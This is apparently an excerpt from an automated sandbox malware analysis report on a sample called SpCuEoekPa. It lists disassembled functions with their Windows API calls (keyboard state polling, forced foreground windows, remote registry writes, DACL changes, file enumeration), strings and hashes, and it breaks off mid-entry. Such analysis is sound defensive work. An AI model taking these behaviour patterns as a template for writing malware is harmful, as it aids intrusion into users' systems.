                                                            Function 003648D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 003648DF
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039D665
                                                            • IsIconic.USER32(?), ref: 0039D66E
                                                            • ShowWindow.USER32(?,00000009), ref: 0039D67B
                                                            • SetForegroundWindow.USER32(?), ref: 0039D685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0039D69B
                                                            • GetCurrentThreadId.KERNEL32 ref: 0039D6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0039D6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0039D6CF
                                                            • SetForegroundWindow.USER32(?), ref: 0039D6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D719
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D71E
                                                            • SetForegroundWindow.USER32(?), ref: 0039D721
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0039D748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
                                                            • Instruction ID: 642f822bd2240e4c38d888727cb78c8fe6e8e9668414d566be5a52567aacc48b
                                                            • Opcode Fuzzy Hash: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
                                                            • Instruction Fuzzy Hash: 91317271A40358BFEF326FA19C8AF7F7E6CEB44B50F114125FA04EA1D1C6B15940AAA0
                                                            Function 003CC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003CC78D
                                                            • FindClose.KERNEL32(00000000), ref: 003CC7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 003CC844
                                                            • __swprintf.LIBCMT ref: 003CC890
                                                            • __swprintf.LIBCMT ref: 003CC8D3
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • __swprintf.LIBCMT ref: 003CC927
                                                              • Part of subcall function 00383698: __woutput_l.LIBCMT ref: 003836F1
                                                            • __swprintf.LIBCMT ref: 003CC975
                                                              • Part of subcall function 00383698: __flsbuf.LIBCMT ref: 00383713
                                                              • Part of subcall function 00383698: __flsbuf.LIBCMT ref: 0038372B
                                                            • __swprintf.LIBCMT ref: 003CC9C4
                                                            • __swprintf.LIBCMT ref: 003CCA13
                                                            • __swprintf.LIBCMT ref: 003CCA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
                                                            • Instruction ID: e16c48491cee95dcb14b8ecef6b17fffa87df88b2bc20cacf8227015758be932
                                                            • Opcode Fuzzy Hash: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
                                                            • Instruction Fuzzy Hash: C2A11EB1414344ABC712EF94C885EAFB7ECAF99704F40492EF595CB191EB35DA08CB62
                                                            Function 003CEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CEFB6
                                                            • _wcscmp.LIBCMT ref: 003CEFCB
                                                            • _wcscmp.LIBCMT ref: 003CEFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 003CEFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 003CF00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 003CF026
                                                            • FindClose.KERNEL32(00000000), ref: 003CF031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 003CF04D
                                                            • _wcscmp.LIBCMT ref: 003CF074
                                                            • _wcscmp.LIBCMT ref: 003CF08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CF09D
                                                            • SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF0C5
                                                            • FindClose.KERNEL32(00000000), ref: 003CF0D2
                                                            • FindClose.KERNEL32(00000000), ref: 003CF0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
                                                            • Instruction ID: 62c06bf3e2beeefdd051011c2849bdfdc9a893b09839c69d217e6add4f1f6cd8
                                                            • Opcode Fuzzy Hash: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
                                                            • Instruction Fuzzy Hash: DF3105365002686FCB26ABA0DC88FEE77AD9F45720F1042BAE800D6091DB70DE80CB55
                                                            Function 003766E1 Relevance: 27.1, Strings: 21, Instructions: 889COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -es$0D@$0E@$0F@$3c7$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG@$_7
                                                            • API String ID: 0-239065333
                                                            • Opcode ID: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
                                                            • Instruction ID: 3c8ce6f38daeacb16a2c5e56dacd14d8b56b597aa3c79f7cc123968890f5d65e
                                                            • Opcode Fuzzy Hash: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
                                                            • Instruction Fuzzy Hash: 6672AD71E006198BDB26CF59C8A17EEB7F5FF44314F54816AE909EB680E7349E81CB90
                                                            Function 003E0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E0953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,003EF910,00000000,?,00000000,?,?), ref: 003E09C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003E0A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003E0A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 003E0DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E0DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: a35c569a2ddec3a76136a772c59df95707cdb476f1415500c07d3c1ceb880ce5
                                                            • Instruction ID: e2b8aa4084c12192a0151a2575a702e3e0af799f96e291798a7cf136fd89a66c
                                                            • Opcode Fuzzy Hash: a35c569a2ddec3a76136a772c59df95707cdb476f1415500c07d3c1ceb880ce5
                                                            • Instruction Fuzzy Hash: 83026B756006519FCB16EF25C881E2AB7E9FF89324F05855DF8999B3A2CB70EC41CB81
                                                            Function 003CF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CF113
                                                            • _wcscmp.LIBCMT ref: 003CF128
                                                            • _wcscmp.LIBCMT ref: 003CF13F
                                                              • Part of subcall function 003C4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003C43A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 003CF16E
                                                            • FindClose.KERNEL32(00000000), ref: 003CF179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 003CF195
                                                            • _wcscmp.LIBCMT ref: 003CF1BC
                                                            • _wcscmp.LIBCMT ref: 003CF1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CF1E5
                                                            • SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF20D
                                                            • FindClose.KERNEL32(00000000), ref: 003CF21A
                                                            • FindClose.KERNEL32(00000000), ref: 003CF22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
                                                            • Instruction ID: 7000f4e104f9e9c6c7ce85e7f4f7c0bc7919bfd83d3326c331a01eb0e498d7be
                                                            • Opcode Fuzzy Hash: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
                                                            • Instruction Fuzzy Hash: AF31073A5002596FCB22AB60EC58FEE77AE9F45320F1506B9E800E61D0DB70DF45CB54
                                                            Function 003CA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003CA20F
                                                            • __swprintf.LIBCMT ref: 003CA231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 003CA26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003CA293
                                                            • _memset.LIBCMT ref: 003CA2B2
                                                            • _wcsncpy.LIBCMT ref: 003CA2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003CA323
                                                            • CloseHandle.KERNEL32(00000000), ref: 003CA32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 003CA337
                                                            • CloseHandle.KERNEL32(00000000), ref: 003CA341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
                                                            • Instruction ID: ba1c5b4f21d56e6aa00b59bdf367cacd3d1b1439e6c6483b1a82b48e7abc9f9e
                                                            • Opcode Fuzzy Hash: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
                                                            • Instruction Fuzzy Hash: B831C87590425DABDB22DFA0DC85FEB77BCEF88744F1041BAF508D6190E7709A448B25
                                                            Function 003B7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003B8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B821E
                                                              • Part of subcall function 003B8202: GetLastError.KERNEL32(?,003B7CE2,?,?,?), ref: 003B8228
                                                              • Part of subcall function 003B8202: GetProcessHeap.KERNEL32(00000008,?,?,003B7CE2,?,?,?), ref: 003B8237
                                                              • Part of subcall function 003B8202: HeapAlloc.KERNEL32(00000000,?,003B7CE2,?,?,?), ref: 003B823E
                                                              • Part of subcall function 003B8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B8255
                                                              • Part of subcall function 003B829F: GetProcessHeap.KERNEL32(00000008,003B7CF8,00000000,00000000,?,003B7CF8,?), ref: 003B82AB
                                                              • Part of subcall function 003B829F: HeapAlloc.KERNEL32(00000000,?,003B7CF8,?), ref: 003B82B2
                                                              • Part of subcall function 003B829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003B7CF8,?), ref: 003B82C3
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003B7D13
                                                            • _memset.LIBCMT ref: 003B7D28
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003B7D47
                                                            • GetLengthSid.ADVAPI32(?), ref: 003B7D58
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 003B7D95
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003B7DB1
                                                            • GetLengthSid.ADVAPI32(?), ref: 003B7DCE
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003B7DDD
                                                            • HeapAlloc.KERNEL32(00000000), ref: 003B7DE4
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003B7E05
                                                            • CopySid.ADVAPI32(00000000), ref: 003B7E0C
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003B7E3D
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003B7E63
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003B7E77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 8395670e53fc56e7ca74a30924f0dd620e0182abf6fd8bc5e0faef05f353cc48
                                                            • Instruction ID: 65d0a2ce6b4db9f63f7ccbafed1bea301d332500942dcc2cd12340b6a4d9adbc
                                                            • Opcode Fuzzy Hash: 8395670e53fc56e7ca74a30924f0dd620e0182abf6fd8bc5e0faef05f353cc48
                                                            • Instruction Fuzzy Hash: F0613D71904209AFDF12DFA4DC85AEEBB79FF44304F048269F915AA291DB71DE05CBA0
                                                            Function 003C001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 003C0097
                                                            • SetKeyboardState.USER32(?), ref: 003C0102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 003C0122
                                                            • GetKeyState.USER32(000000A0), ref: 003C0139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 003C0168
                                                            • GetKeyState.USER32(000000A1), ref: 003C0179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 003C01A5
                                                            • GetKeyState.USER32(00000011), ref: 003C01B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 003C01DC
                                                            • GetKeyState.USER32(00000012), ref: 003C01EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 003C0213
                                                            • GetKeyState.USER32(0000005B), ref: 003C0221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
                                                            • Instruction ID: b71b0a55b0dc8c633f166851dc64926a6d3f31064f5bcdad924b2fbee38c6101
                                                            • Opcode Fuzzy Hash: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
                                                            • Instruction Fuzzy Hash: 7F51DB249047D899FB3BDBA08854FAABFB49F01380F09459E95C19A5C3DAA49F8CC761
                                                            Function 003E03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E04AC
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003E054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003E05E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003E0822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 6a9efaa7ebbfdf035e3f7b4d43dd1ece0f56d56a955fc4035902a6719e41c775
                                                            • Instruction ID: 828a36e16fb88f0a58a21f0a51bc54ec917977a3d4a679e1a1f6e4cfea3dd248
                                                            • Opcode Fuzzy Hash: 6a9efaa7ebbfdf035e3f7b4d43dd1ece0f56d56a955fc4035902a6719e41c775
                                                            • Instruction Fuzzy Hash: 46E16D71604250AFCB16DF25C891E2ABBE8FF89314F04C56DF84ADB2A2D670ED45CB91
                                                            Function 003D83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • CoInitialize.OLE32 ref: 003D8403
                                                            • CoUninitialize.OLE32 ref: 003D840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,003F2BEC,?), ref: 003D846E
                                                            • IIDFromString.OLE32(?,?), ref: 003D84E1
                                                            • VariantInit.OLEAUT32(?), ref: 003D857B
                                                            • VariantClear.OLEAUT32(?), ref: 003D85DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: ae33ac5455e99e11dc573a5c795631cd894bcda3b476919f44a57b9c54c7bcf5
                                                            • Instruction ID: 6e24c6e979911c987482c2ea11a81094000eb65b6c591bddd86a6add62ab9566
                                                            • Opcode Fuzzy Hash: ae33ac5455e99e11dc573a5c795631cd894bcda3b476919f44a57b9c54c7bcf5
                                                            • Instruction Fuzzy Hash: 9C61BF726083129FC712DF55E888F6AB7E9AF49714F00451EF9819B391CB70ED44CB92
                                                            Function 003D4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
                                                            • Instruction ID: 4088fff98d02be1f3041d5c9050f016c83f5a3fbdc3d15d0c00f66168e5dc555
